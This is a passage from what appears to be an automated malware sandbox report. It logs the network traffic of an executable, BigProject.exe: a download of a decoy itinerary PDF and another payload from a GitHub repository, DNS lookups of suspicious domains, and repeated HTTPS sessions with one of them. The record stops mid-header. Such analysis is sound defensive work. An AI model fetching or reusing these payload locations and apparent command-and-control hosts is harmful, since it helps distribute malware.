Dec 21, 2024 13:17:31.560389996 CET	443	49750	172.67.197.170	192.168.2.5
Dec 21, 2024 13:17:32.550749063 CET	443	49750	172.67.197.170	192.168.2.5
Dec 21, 2024 13:17:32.550846100 CET	443	49750	172.67.197.170	192.168.2.5
Dec 21, 2024 13:17:32.550916910 CET	49750	443	192.168.2.5	172.67.197.170
Dec 21, 2024 13:17:32.551048994 CET	49750	443	192.168.2.5	172.67.197.170
Dec 21, 2024 13:17:32.551073074 CET	443	49750	172.67.197.170	192.168.2.5
Dec 21, 2024 13:17:32.652653933 CET	49756	443	192.168.2.5	172.67.197.170
Dec 21, 2024 13:17:32.652688026 CET	443	49756	172.67.197.170	192.168.2.5
Dec 21, 2024 13:17:32.652766943 CET	49756	443	192.168.2.5	172.67.197.170
Dec 21, 2024 13:17:32.656883001 CET	49756	443	192.168.2.5	172.67.197.170
Dec 21, 2024 13:17:32.656893969 CET	443	49756	172.67.197.170	192.168.2.5
Dec 21, 2024 13:17:33.876255035 CET	443	49756	172.67.197.170	192.168.2.5
Dec 21, 2024 13:17:33.876390934 CET	49756	443	192.168.2.5	172.67.197.170
Dec 21, 2024 13:17:33.881055117 CET	49756	443	192.168.2.5	172.67.197.170
Dec 21, 2024 13:17:33.881067038 CET	443	49756	172.67.197.170	192.168.2.5
Dec 21, 2024 13:17:33.881381035 CET	443	49756	172.67.197.170	192.168.2.5
Dec 21, 2024 13:17:33.889219046 CET	49756	443	192.168.2.5	172.67.197.170
Dec 21, 2024 13:17:33.889390945 CET	49756	443	192.168.2.5	172.67.197.170
Dec 21, 2024 13:17:33.889395952 CET	443	49756	172.67.197.170	192.168.2.5
Dec 21, 2024 13:17:34.549523115 CET	443	49756	172.67.197.170	192.168.2.5
Dec 21, 2024 13:17:34.549631119 CET	443	49756	172.67.197.170	192.168.2.5
Dec 21, 2024 13:17:34.549738884 CET	49756	443	192.168.2.5	172.67.197.170
Dec 21, 2024 13:17:34.553343058 CET	49756	443	192.168.2.5	172.67.197.170
Dec 21, 2024 13:17:34.553360939 CET	443	49756	172.67.197.170	192.168.2.5
Dec 21, 2024 13:17:35.497153997 CET	49762	443	192.168.2.5	172.67.197.170
Dec 21, 2024 13:17:35.497247934 CET	443	49762	172.67.197.170	192.168.2.5
Dec 21, 2024 13:17:35.497571945 CET	49762	443	192.168.2.5	172.67.197.170
Dec 21, 2024 13:17:35.498075962 CET	49762	443	192.168.2.5	172.67.197.170
Dec 21, 2024 13:17:35.498131037 CET	443	49762	172.67.197.170	192.168.2.5
Dec 21, 2024 13:17:36.710232973 CET	443	49762	172.67.197.170	192.168.2.5
Dec 21, 2024 13:17:36.710321903 CET	49762	443	192.168.2.5	172.67.197.170
Dec 21, 2024 13:17:36.711553097 CET	49762	443	192.168.2.5	172.67.197.170
Dec 21, 2024 13:17:36.711585045 CET	443	49762	172.67.197.170	192.168.2.5
Dec 21, 2024 13:17:36.711831093 CET	443	49762	172.67.197.170	192.168.2.5
Dec 21, 2024 13:17:36.721273899 CET	49762	443	192.168.2.5	172.67.197.170
Dec 21, 2024 13:17:36.722162008 CET	49762	443	192.168.2.5	172.67.197.170
Dec 21, 2024 13:17:36.722212076 CET	443	49762	172.67.197.170	192.168.2.5
Dec 21, 2024 13:17:36.722338915 CET	49762	443	192.168.2.5	172.67.197.170
Dec 21, 2024 13:17:36.722388983 CET	443	49762	172.67.197.170	192.168.2.5
Dec 21, 2024 13:17:36.722542048 CET	49762	443	192.168.2.5	172.67.197.170
Dec 21, 2024 13:17:36.722587109 CET	443	49762	172.67.197.170	192.168.2.5
Dec 21, 2024 13:17:36.722716093 CET	49762	443	192.168.2.5	172.67.197.170
Dec 21, 2024 13:17:36.722749949 CET	443	49762	172.67.197.170	192.168.2.5
Dec 21, 2024 13:17:36.722968102 CET	49762	443	192.168.2.5	172.67.197.170
Dec 21, 2024 13:17:36.723006010 CET	443	49762	172.67.197.170	192.168.2.5
Dec 21, 2024 13:17:36.723557949 CET	49762	443	192.168.2.5	172.67.197.170
Dec 21, 2024 13:17:36.723615885 CET	443	49762	172.67.197.170	192.168.2.5
Dec 21, 2024 13:17:36.723627090 CET	49762	443	192.168.2.5	172.67.197.170
Dec 21, 2024 13:17:36.723634958 CET	443	49762	172.67.197.170	192.168.2.5
Dec 21, 2024 13:17:36.723793030 CET	49762	443	192.168.2.5	172.67.197.170
Dec 21, 2024 13:17:36.723824024 CET	443	49762	172.67.197.170	192.168.2.5
Dec 21, 2024 13:17:36.723840952 CET	49762	443	192.168.2.5	172.67.197.170
Dec 21, 2024 13:17:36.723978043 CET	49762	443	192.168.2.5	172.67.197.170
Dec 21, 2024 13:17:36.724004030 CET	49762	443	192.168.2.5	172.67.197.170
Dec 21, 2024 13:17:36.767337084 CET	443	49762	172.67.197.170	192.168.2.5
Dec 21, 2024 13:17:39.218564987 CET	443	49762	172.67.197.170	192.168.2.5
Dec 21, 2024 13:17:39.218642950 CET	443	49762	172.67.197.170	192.168.2.5
Dec 21, 2024 13:17:39.218874931 CET	49762	443	192.168.2.5	172.67.197.170
Dec 21, 2024 13:17:39.219026089 CET	49762	443	192.168.2.5	172.67.197.170
Dec 21, 2024 13:17:39.219043970 CET	443	49762	172.67.197.170	192.168.2.5
Dec 21, 2024 13:17:39.227533102 CET	49773	443	192.168.2.5	172.67.197.170
Dec 21, 2024 13:17:39.227564096 CET	443	49773	172.67.197.170	192.168.2.5
Dec 21, 2024 13:17:39.227649927 CET	49773	443	192.168.2.5	172.67.197.170
Dec 21, 2024 13:17:39.228852034 CET	49773	443	192.168.2.5	172.67.197.170
Dec 21, 2024 13:17:39.228866100 CET	443	49773	172.67.197.170	192.168.2.5
Dec 21, 2024 13:17:40.621884108 CET	443	49773	172.67.197.170	192.168.2.5
Dec 21, 2024 13:17:40.621968031 CET	49773	443	192.168.2.5	172.67.197.170
Dec 21, 2024 13:17:40.623446941 CET	49773	443	192.168.2.5	172.67.197.170
Dec 21, 2024 13:17:40.623477936 CET	443	49773	172.67.197.170	192.168.2.5
Dec 21, 2024 13:17:40.623753071 CET	443	49773	172.67.197.170	192.168.2.5
Dec 21, 2024 13:17:40.625452995 CET	49773	443	192.168.2.5	172.67.197.170
Dec 21, 2024 13:17:40.625489950 CET	49773	443	192.168.2.5	172.67.197.170
Dec 21, 2024 13:17:40.625530005 CET	443	49773	172.67.197.170	192.168.2.5
Dec 21, 2024 13:17:41.374320030 CET	443	49773	172.67.197.170	192.168.2.5
Dec 21, 2024 13:17:41.374411106 CET	443	49773	172.67.197.170	192.168.2.5
Dec 21, 2024 13:17:41.375034094 CET	49773	443	192.168.2.5	172.67.197.170
Dec 21, 2024 13:17:41.377161026 CET	49773	443	192.168.2.5	172.67.197.170
Dec 21, 2024 13:17:41.377202988 CET	443	49773	172.67.197.170	192.168.2.5
Dec 21, 2024 13:17:41.377230883 CET	49773	443	192.168.2.5	172.67.197.170
Dec 21, 2024 13:17:41.377248049 CET	443	49773	172.67.197.170	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 21, 2024 13:17:12.814019918 CET	50371	53	192.168.2.5	1.1.1.1
Dec 21, 2024 13:17:12.954610109 CET	53	50371	1.1.1.1	192.168.2.5
Dec 21, 2024 13:17:19.458193064 CET	55243	53	192.168.2.5	1.1.1.1
Dec 21, 2024 13:17:19.766582012 CET	53	55243	1.1.1.1	192.168.2.5
Dec 21, 2024 13:17:19.960726976 CET	58190	53	192.168.2.5	1.1.1.1
Dec 21, 2024 13:17:20.270523071 CET	53	58190	1.1.1.1	192.168.2.5
Dec 21, 2024 13:17:20.422775984 CET	64951	53	192.168.2.5	1.1.1.1
Dec 21, 2024 13:17:20.734309912 CET	53	64951	1.1.1.1	192.168.2.5
Dec 21, 2024 13:17:27.857302904 CET	62891	53	192.168.2.5	1.1.1.1
Dec 21, 2024 13:17:41.535435915 CET	65190	53	192.168.2.5	1.1.1.1
Dec 21, 2024 13:17:55.160456896 CET	53969	53	192.168.2.5	1.1.1.1

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 21, 2024 13:17:12.814019918 CET	192.168.2.5	1.1.1.1	0x7a26	Standard query (0)	raw.githubusercontent.com	A (IP address)	IN (0x0001)	false
Dec 21, 2024 13:17:19.458193064 CET	192.168.2.5	1.1.1.1	0xa91f	Standard query (0)	stem-mellows.cyou	A (IP address)	IN (0x0001)	false
Dec 21, 2024 13:17:19.960726976 CET	192.168.2.5	1.1.1.1	0xed38	Standard query (0)	grannyejh.lat	A (IP address)	IN (0x0001)	false
Dec 21, 2024 13:17:20.422775984 CET	192.168.2.5	1.1.1.1	0xd48	Standard query (0)	discokeyus.lat	A (IP address)	IN (0x0001)	false
Dec 21, 2024 13:17:27.857302904 CET	192.168.2.5	1.1.1.1	0xec05	Standard query (0)	x1.i.lencr.org	A (IP address)	IN (0x0001)	false
Dec 21, 2024 13:17:41.535435915 CET	192.168.2.5	1.1.1.1	0x25e1	Standard query (0)	x1.i.lencr.org	A (IP address)	IN (0x0001)	false
Dec 21, 2024 13:17:55.160456896 CET	192.168.2.5	1.1.1.1	0x8c61	Standard query (0)	x1.i.lencr.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 21, 2024 13:17:12.954610109 CET	1.1.1.1	192.168.2.5	0x7a26	No error (0)	raw.githubusercontent.com		185.199.110.133	A (IP address)	IN (0x0001)	false
Dec 21, 2024 13:17:12.954610109 CET	1.1.1.1	192.168.2.5	0x7a26	No error (0)	raw.githubusercontent.com		185.199.108.133	A (IP address)	IN (0x0001)	false
Dec 21, 2024 13:17:12.954610109 CET	1.1.1.1	192.168.2.5	0x7a26	No error (0)	raw.githubusercontent.com		185.199.111.133	A (IP address)	IN (0x0001)	false
Dec 21, 2024 13:17:12.954610109 CET	1.1.1.1	192.168.2.5	0x7a26	No error (0)	raw.githubusercontent.com		185.199.109.133	A (IP address)	IN (0x0001)	false
Dec 21, 2024 13:17:19.766582012 CET	1.1.1.1	192.168.2.5	0xa91f	Name error (3)	stem-mellows.cyou	none	none	A (IP address)	IN (0x0001)	false
Dec 21, 2024 13:17:20.270523071 CET	1.1.1.1	192.168.2.5	0xed38	Name error (3)	grannyejh.lat	none	none	A (IP address)	IN (0x0001)	false
Dec 21, 2024 13:17:20.734309912 CET	1.1.1.1	192.168.2.5	0xd48	No error (0)	discokeyus.lat		172.67.197.170	A (IP address)	IN (0x0001)	false
Dec 21, 2024 13:17:20.734309912 CET	1.1.1.1	192.168.2.5	0xd48	No error (0)	discokeyus.lat		104.21.21.99	A (IP address)	IN (0x0001)	false
Dec 21, 2024 13:17:27.995652914 CET	1.1.1.1	192.168.2.5	0xec05	No error (0)	x1.i.lencr.org	crl.root-x1.letsencrypt.org.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 21, 2024 13:17:41.774622917 CET	1.1.1.1	192.168.2.5	0x25e1	No error (0)	x1.i.lencr.org	crl.root-x1.letsencrypt.org.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 21, 2024 13:17:55.467858076 CET	1.1.1.1	192.168.2.5	0x8c61	No error (0)	x1.i.lencr.org	crl.root-x1.letsencrypt.org.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false

HTTP Request Dependency Graph

raw.githubusercontent.com

discokeyus.lat

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49704	185.199.110.133	443	6008	C:\Users\user\Desktop\BigProject.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-21 12:17:14 UTC	156	OUT	GET /AromatcHEBUYRKOS/chekingbebra/refs/heads/main/NavanItinerary.pdf HTTP/1.1 User-Agent: cs Host: raw.githubusercontent.com Cache-Control: no-cache
2024-12-21 12:17:14 UTC	900	IN	HTTP/1.1 200 OK Connection: close Content-Length: 51800 Cache-Control: max-age=300 Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox Content-Type: application/octet-stream ETag: "d32f4c1e80a62c4f5d8f857d33475518d5b7f4c7ed875b8a5eda1a9fbb6d7185" Strict-Transport-Security: max-age=31536000 X-Content-Type-Options: nosniff X-Frame-Options: deny X-XSS-Protection: 1; mode=block X-GitHub-Request-Id: C844:3EC87C:3E257F:4737C0:6766B1CA Accept-Ranges: bytes Date: Sat, 21 Dec 2024 12:17:14 GMT Via: 1.1 varnish X-Served-By: cache-ewr-kewr1740028-EWR X-Cache: MISS X-Cache-Hits: 0 X-Timer: S1734783434.474871,VS0,VE47 Vary: Authorization,Accept-Encoding,Origin Access-Control-Allow-Origin: * Cross-Origin-Resource-Policy: cross-origin X-Fastly-Request-ID: f20ea6e6b557ffedfa0466839a2129f3c1423294 Expires: Sat, 21 Dec 2024 12:22:14 GMT Source-Age: 0
2024-12-21 12:17:14 UTC	1378	IN	Data Raw: 25 50 44 46 2d 31 2e 34 0a 25 d3 eb e9 e1 0a 31 20 30 20 6f 62 6a 0a 3c 3c 2f 54 69 74 6c 65 20 28 4e 61 76 61 6e 20 2d 20 49 74 69 6e 65 72 61 72 79 29 0a 2f 43 72 65 61 74 6f 72 20 28 4d 6f 7a 69 6c 6c 61 2f 35 2e 30 20 5c 28 57 69 6e 64 6f 77 73 20 4e 54 20 31 30 2e 30 3b 20 57 69 6e 36 34 3b 20 78 36 34 5c 29 20 41 70 70 6c 65 57 65 62 4b 69 74 2f 35 33 37 2e 33 36 20 5c 28 4b 48 54 4d 4c 2c 20 6c 69 6b 65 20 47 65 63 6b 6f 5c 29 20 43 68 72 6f 6d 65 2f 31 32 38 2e 30 2e 30 2e 30 20 53 61 66 61 72 69 2f 35 33 37 2e 33 36 29 0a 2f 50 72 6f 64 75 63 65 72 20 28 53 6b 69 61 2f 50 44 46 20 6d 31 32 38 29 0a 2f 43 72 65 61 74 69 6f 6e 44 61 74 65 20 28 44 3a 32 30 32 34 30 39 30 39 32 32 32 36 31 39 2b 30 30 27 30 30 27 29 0a 2f 4d 6f 64 44 61 74 65 20 28 Data Ascii: %PDF-1.4%1 0 obj<</Title (Navan - Itinerary)/Creator (Mozilla/5.0 $Windows NT 10.0; Win64; x64$ AppleWebKit/537.36 $KHTML, like Gecko$ Chrome/128.0.0.0 Safari/537.36)/Producer (Skia/PDF m128)/CreationDate (D:20240909222619+00'00')/ModDate (
2024-12-21 12:17:14 UTC	1378	IN	Data Raw: 5f d3 96 48 75 b8 9b ab 52 87 ea d2 9e ba 2a 4d 1b ec 46 bf 39 2b 6d 80 0d 79 76 45 e9 9e b4 82 62 13 dc 3b 2c 15 60 ec 3e 7f 8a f7 9c 1f 93 3b 9b cb 3a 47 6c 32 c1 1a d4 a8 fb 2c c4 11 28 cd 4d 56 25 b0 80 60 4c e7 b0 c5 6a 0b 20 eb 66 86 c5 2a 18 59 a0 74 31 1a 41 ab 58 b1 a6 18 03 5c ba 6a f7 c4 c0 41 48 6a 37 d2 ae b4 db c2 3e b9 68 15 4c 9a 84 0d 56 17 b4 9a 41 b8 f3 6e c5 10 d0 43 77 69 8e 31 20 e9 9a 09 59 05 0a d6 68 6b a6 a4 90 88 cf 09 51 b1 06 9c fe 77 cb b5 9e f2 27 79 f6 dd 6f 0e bf 3b fc ee f0 43 a6 4c da 7a 88 a8 8e 45 28 14 84 f8 96 14 72 3d d9 53 47 ab 5a 96 7f bd c9 94 3a 3e 5d dc 52 c7 b7 1f 0f af fe ad bc 7e fd ea b7 ef fe f5 7d c1 f2 e6 cd db f7 ef 0e af 3e 64 3e 5a 3e 7e 77 a0 29 07 a6 52 d3 90 ca c7 cf 87 d7 88 fc f6 4d f9 f8 5f 87 Data Ascii: _HuRMF9+myvEb;,`>;:Gl2,(MV%`Lj fYt1AX\jAHj7>hLVAnCwi1 YhkQw'yo;CLzE(r=SGZ:>]R~}>d>Z>~w)RM_
2024-12-21 12:17:14 UTC	1378	IN	Data Raw: 7a c1 36 ef 37 9b b1 0d 2c 66 a3 99 95 9e 56 9e 18 c7 4d b7 ad 28 cc 46 d7 3e 15 fa 99 6d 86 70 dc d8 48 f7 26 68 27 ee ad b6 e3 cc 60 63 61 be 69 60 3d d3 0c a0 6c 79 50 3b a3 87 f9 ac e0 76 d2 38 ce ba 31 eb f7 d3 3c 2b 5f e1 77 6d 85 55 4a 96 2c dc c7 df 77 17 a8 be d0 ed eb 54 4b bd aa 9a 7f ef 4c 71 dc c7 d6 85 b7 98 1c dc 25 77 57 03 e0 ab 7f ff ef 3f fc e5 f5 eb 57 0f 8f 7f fd df 3f 7c fa f8 c7 ff fb 6b f9 a7 ef fe fc cf e5 cd 9b 92 dc 4a fb cf c4 68 d7 1b 7f bf 71 b9 77 3e 8f f3 cc 21 2b 86 3d ed 59 31 02 42 b2 f9 d5 9e aa d2 3d 2f 0d 17 a8 5d d5 83 2a b0 25 5f fd 3a 63 c5 b7 0b 39 8d 77 f3 d0 ef 16 25 cc a6 97 fa c9 11 06 ca ea 68 47 e8 38 0e 88 2d 67 5a 36 97 6c c3 7b 4e e8 cf ab f4 85 3e 6b 57 e9 f5 31 67 86 7c 6a 31 17 5c e1 fd 72 bc a8 d3 b2 Data Ascii: z67,fVM(F>mpH&h'`cai`=lyP;v81<+_wmUJ,wTKLq%wW?W?\|kJhqw>!+=Y1B=/]*%_:c9w%hG8-gZ6l{N>kW1g\|j1\r
2024-12-21 12:17:14 UTC	1378	IN	Data Raw: 6e ca c7 4c 1c da c7 d0 a2 3e 0c 80 0f b9 2b b1 4b fd 71 3f 54 a8 c7 59 dd 96 ca 2d c9 dd f4 77 b7 ff b6 a9 9d d5 3e 5d 26 be cf f0 66 9b 9e eb fa 0b 87 95 c1 a2 f9 f1 61 be f5 b0 82 e5 1f 0b 3d 3a 7c c4 94 ff 07 ef 41 42 f2 0a 65 6e 64 73 74 72 65 61 6d 0a 65 6e 64 6f 62 6a 0a 39 20 30 20 6f 62 6a 0a 3c 3c 2f 46 69 6c 74 65 72 20 2f 46 6c 61 74 65 44 65 63 6f 64 65 0a 2f 4c 65 6e 67 74 68 20 35 35 35 3e 3e 20 73 74 72 65 61 6d 0a 78 9c bd 56 5d 6b 1b 31 10 7c d7 af d8 e7 42 95 5d ad 56 5a 41 09 c4 6e 9d e7 94 83 fe 80 b4 0d 14 1c 48 fa ff a1 f8 ce ee dd 81 07 5b 0f b1 9f ce 0c a3 d9 d9 2f 29 26 6d e3 8f 98 98 3e c7 c5 5f cf 12 9b b4 e6 f4 bc 0f 6f 81 a9 a4 68 a4 d6 a2 56 23 ad d1 e8 fd 57 f8 f1 89 5e c3 5b d0 28 c9 c6 33 e6 af e7 7d e0 f1 e3 fb 23 4d 1f Data Ascii: nL>+Kq?TY-w>]&fa=:\|ABendstreamendobj9 0 obj<</Filter /FlateDecode/Length 555>> streamxV]k1\|B]VZAnH[/)&m>_ohV#W^[(3}#M
2024-12-21 12:17:14 UTC	1378	IN	Data Raw: 2f 53 74 72 75 63 74 45 6c 65 6d 0a 2f 53 20 2f 44 69 76 0a 2f 50 20 31 32 20 30 20 52 0a 2f 4b 20 5b 31 34 20 30 20 52 5d 0a 2f 49 44 20 28 6e 6f 64 65 30 30 30 30 33 37 32 30 29 3e 3e 0a 65 6e 64 6f 62 6a 0a 31 36 20 30 20 6f 62 6a 0a 3c 3c 2f 54 79 70 65 20 2f 53 74 72 75 63 74 45 6c 65 6d 0a 2f 53 20 2f 4e 6f 6e 53 74 72 75 63 74 0a 2f 50 20 31 35 20 30 20 52 0a 2f 4b 20 5b 3c 3c 2f 54 79 70 65 20 2f 4d 43 52 0a 2f 50 67 20 32 20 30 20 52 0a 2f 4d 43 49 44 20 31 3e 3e 5d 0a 2f 49 44 20 28 6e 6f 64 65 30 30 30 30 33 35 38 35 29 3e 3e 0a 65 6e 64 6f 62 6a 0a 31 35 20 30 20 6f 62 6a 0a 3c 3c 2f 54 79 70 65 20 2f 53 74 72 75 63 74 45 6c 65 6d 0a 2f 53 20 2f 44 69 76 0a 2f 50 20 31 32 20 30 20 52 0a 2f 4b 20 5b 31 36 20 30 20 52 5d 0a 2f 49 44 20 28 6e 6f Data Ascii: /StructElem/S /Div/P 12 0 R/K [14 0 R]/ID (node00003720)>>endobj16 0 obj<</Type /StructElem/S /NonStruct/P 15 0 R/K [<</Type /MCR/Pg 2 0 R/MCID 1>>]/ID (node00003585)>>endobj15 0 obj<</Type /StructElem/S /Div/P 12 0 R/K [16 0 R]/ID (no
2024-12-21 12:17:14 UTC	1378	IN	Data Raw: 67 20 32 20 30 20 52 0a 2f 4d 43 49 44 20 37 3e 3e 5d 0a 2f 49 44 20 28 6e 6f 64 65 30 30 30 30 33 35 39 33 29 3e 3e 0a 65 6e 64 6f 62 6a 0a 32 37 20 30 20 6f 62 6a 0a 3c 3c 2f 54 79 70 65 20 2f 53 74 72 75 63 74 45 6c 65 6d 0a 2f 53 20 2f 44 69 76 0a 2f 50 20 31 32 20 30 20 52 0a 2f 4b 20 5b 32 38 20 30 20 52 5d 0a 2f 49 44 20 28 6e 6f 64 65 30 30 30 30 33 37 33 35 29 3e 3e 0a 65 6e 64 6f 62 6a 0a 33 30 20 30 20 6f 62 6a 0a 3c 3c 2f 54 79 70 65 20 2f 53 74 72 75 63 74 45 6c 65 6d 0a 2f 53 20 2f 4e 6f 6e 53 74 72 75 63 74 0a 2f 50 20 32 39 20 30 20 52 0a 2f 4b 20 5b 3c 3c 2f 54 79 70 65 20 2f 4d 43 52 0a 2f 50 67 20 32 20 30 20 52 0a 2f 4d 43 49 44 20 38 3e 3e 5d 0a 2f 49 44 20 28 6e 6f 64 65 30 30 30 30 33 35 39 34 29 3e 3e 0a 65 6e 64 6f 62 6a 0a 32 39 Data Ascii: g 2 0 R/MCID 7>>]/ID (node00003593)>>endobj27 0 obj<</Type /StructElem/S /Div/P 12 0 R/K [28 0 R]/ID (node00003735)>>endobj30 0 obj<</Type /StructElem/S /NonStruct/P 29 0 R/K [<</Type /MCR/Pg 2 0 R/MCID 8>>]/ID (node00003594)>>endobj29
2024-12-21 12:17:14 UTC	1378	IN	Data Raw: 20 6f 62 6a 0a 3c 3c 2f 54 79 70 65 20 2f 53 74 72 75 63 74 45 6c 65 6d 0a 2f 53 20 2f 4e 6f 6e 53 74 72 75 63 74 0a 2f 50 20 34 31 20 30 20 52 0a 2f 4b 20 5b 3c 3c 2f 54 79 70 65 20 2f 4d 43 52 0a 2f 50 67 20 32 20 30 20 52 0a 2f 4d 43 49 44 20 31 34 3e 3e 5d 0a 2f 49 44 20 28 6e 6f 64 65 30 30 30 30 33 36 30 30 29 3e 3e 0a 65 6e 64 6f 62 6a 0a 34 31 20 30 20 6f 62 6a 0a 3c 3c 2f 54 79 70 65 20 2f 53 74 72 75 63 74 45 6c 65 6d 0a 2f 53 20 2f 44 69 76 0a 2f 50 20 31 32 20 30 20 52 0a 2f 4b 20 5b 34 32 20 30 20 52 5d 0a 2f 49 44 20 28 6e 6f 64 65 30 30 30 30 33 35 37 30 29 3e 3e 0a 65 6e 64 6f 62 6a 0a 34 34 20 30 20 6f 62 6a 0a 3c 3c 2f 54 79 70 65 20 2f 53 74 72 75 63 74 45 6c 65 6d 0a 2f 53 20 2f 4e 6f 6e 53 74 72 75 63 74 0a 2f 50 20 34 33 20 30 20 52 Data Ascii: obj<</Type /StructElem/S /NonStruct/P 41 0 R/K [<</Type /MCR/Pg 2 0 R/MCID 14>>]/ID (node00003600)>>endobj41 0 obj<</Type /StructElem/S /Div/P 12 0 R/K [42 0 R]/ID (node00003570)>>endobj44 0 obj<</Type /StructElem/S /NonStruct/P 43 0 R
2024-12-21 12:17:14 UTC	1378	IN	Data Raw: 72 75 63 74 45 6c 65 6d 0a 2f 53 20 2f 44 69 76 0a 2f 50 20 31 32 20 30 20 52 0a 2f 4b 20 5b 35 34 20 30 20 52 5d 0a 2f 49 44 20 28 6e 6f 64 65 30 30 30 30 33 37 35 30 29 3e 3e 0a 65 6e 64 6f 62 6a 0a 35 36 20 30 20 6f 62 6a 0a 3c 3c 2f 54 79 70 65 20 2f 53 74 72 75 63 74 45 6c 65 6d 0a 2f 53 20 2f 4e 6f 6e 53 74 72 75 63 74 0a 2f 50 20 35 35 20 30 20 52 0a 2f 4b 20 5b 3c 3c 2f 54 79 70 65 20 2f 4d 43 52 0a 2f 50 67 20 32 20 30 20 52 0a 2f 4d 43 49 44 20 32 31 3e 3e 5d 0a 2f 49 44 20 28 6e 6f 64 65 30 30 30 30 33 36 30 38 29 3e 3e 0a 65 6e 64 6f 62 6a 0a 35 35 20 30 20 6f 62 6a 0a 3c 3c 2f 54 79 70 65 20 2f 53 74 72 75 63 74 45 6c 65 6d 0a 2f 53 20 2f 44 69 76 0a 2f 50 20 31 32 20 30 20 52 0a 2f 4b 20 5b 35 36 20 30 20 52 5d 0a 2f 49 44 20 28 6e 6f 64 65 Data Ascii: ructElem/S /Div/P 12 0 R/K [54 0 R]/ID (node00003750)>>endobj56 0 obj<</Type /StructElem/S /NonStruct/P 55 0 R/K [<</Type /MCR/Pg 2 0 R/MCID 21>>]/ID (node00003608)>>endobj55 0 obj<</Type /StructElem/S /Div/P 12 0 R/K [56 0 R]/ID (node
2024-12-21 12:17:14 UTC	1378	IN	Data Raw: 0a 2f 50 67 20 32 20 30 20 52 0a 2f 4d 43 49 44 20 32 37 3e 3e 5d 0a 2f 49 44 20 28 6e 6f 64 65 30 30 30 30 33 36 31 34 29 3e 3e 0a 65 6e 64 6f 62 6a 0a 36 37 20 30 20 6f 62 6a 0a 3c 3c 2f 54 79 70 65 20 2f 53 74 72 75 63 74 45 6c 65 6d 0a 2f 53 20 2f 44 69 76 0a 2f 50 20 31 32 20 30 20 52 0a 2f 4b 20 5b 36 38 20 30 20 52 5d 0a 2f 49 44 20 28 6e 6f 64 65 30 30 30 30 33 35 37 37 29 3e 3e 0a 65 6e 64 6f 62 6a 0a 37 30 20 30 20 6f 62 6a 0a 3c 3c 2f 54 79 70 65 20 2f 53 74 72 75 63 74 45 6c 65 6d 0a 2f 53 20 2f 4e 6f 6e 53 74 72 75 63 74 0a 2f 50 20 36 39 20 30 20 52 0a 2f 4b 20 5b 3c 3c 2f 54 79 70 65 20 2f 4d 43 52 0a 2f 50 67 20 32 20 30 20 52 0a 2f 4d 43 49 44 20 32 38 3e 3e 5d 0a 2f 49 44 20 28 6e 6f 64 65 30 30 30 30 33 36 31 35 29 3e 3e 0a 65 6e 64 6f Data Ascii: /Pg 2 0 R/MCID 27>>]/ID (node00003614)>>endobj67 0 obj<</Type /StructElem/S /Div/P 12 0 R/K [68 0 R]/ID (node00003577)>>endobj70 0 obj<</Type /StructElem/S /NonStruct/P 69 0 R/K [<</Type /MCR/Pg 2 0 R/MCID 28>>]/ID (node00003615)>>endo
2024-12-21 12:17:14 UTC	1378	IN	Data Raw: 52 20 33 38 20 30 20 52 20 34 30 20 30 20 52 20 34 32 20 30 20 52 20 34 34 20 30 20 52 20 34 36 20 30 20 52 20 34 38 20 30 20 52 20 35 30 20 30 20 52 20 35 32 20 30 20 52 20 35 34 20 30 20 52 20 35 36 20 30 20 52 20 35 38 20 30 20 52 20 36 30 20 30 20 52 20 36 32 20 30 20 52 20 36 34 20 30 20 52 20 36 36 20 30 20 52 20 36 38 20 30 20 52 20 37 30 20 30 20 52 20 37 32 20 30 20 52 20 37 34 20 30 20 52 20 37 36 20 30 20 52 5d 0a 65 6e 64 6f 62 6a 0a 37 38 20 30 20 6f 62 6a 0a 3c 3c 2f 54 79 70 65 20 2f 50 61 72 65 6e 74 54 72 65 65 0a 2f 4e 75 6d 73 20 5b 30 20 37 37 20 30 20 52 5d 3e 3e 0a 65 6e 64 6f 62 6a 0a 37 39 20 30 20 6f 62 6a 0a 3c 3c 2f 4c 69 6d 69 74 73 20 5b 28 6e 6f 64 65 30 30 30 30 33 35 36 30 29 20 28 6e 6f 64 65 30 30 30 30 33 37 36 32 29 5d Data Ascii: R 38 0 R 40 0 R 42 0 R 44 0 R 46 0 R 48 0 R 50 0 R 52 0 R 54 0 R 56 0 R 58 0 R 60 0 R 62 0 R 64 0 R 66 0 R 68 0 R 70 0 R 72 0 R 74 0 R 76 0 R]endobj78 0 obj<</Type /ParentTree/Nums [0 77 0 R]>>endobj79 0 obj<</Limits [(node00003560) (node00003762)]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49705	185.199.110.133	443	6008	C:\Users\user\Desktop\BigProject.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-21 12:17:16 UTC	155	OUT	GET /AromatcHEBUYRKOS/chekingbebra/refs/heads/main/millliiiiion HTTP/1.1 Accept: / User-Agent: Chrome/95.0.4638.54 Host: raw.githubusercontent.com
2024-12-21 12:17:17 UTC	902	IN	HTTP/1.1 200 OK Connection: close Content-Length: 402776 Cache-Control: max-age=300 Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox Content-Type: text/plain; charset=utf-8 ETag: "c3e920dbef59fc3a3c019e65b37b7d4f4a9ad39def770189ecd20df7933f8e65" Strict-Transport-Security: max-age=31536000 X-Content-Type-Options: nosniff X-Frame-Options: deny X-XSS-Protection: 1; mode=block X-GitHub-Request-Id: 23FA:38F086:93743F:A451AC:6766B1CB Accept-Ranges: bytes Date: Sat, 21 Dec 2024 12:17:17 GMT Via: 1.1 varnish X-Served-By: cache-nyc-kteb1890073-NYC X-Cache: MISS X-Cache-Hits: 0 X-Timer: S1734783437.993040,VS0,VE73 Vary: Authorization,Accept-Encoding,Origin Access-Control-Allow-Origin: * Cross-Origin-Resource-Policy: cross-origin X-Fastly-Request-ID: 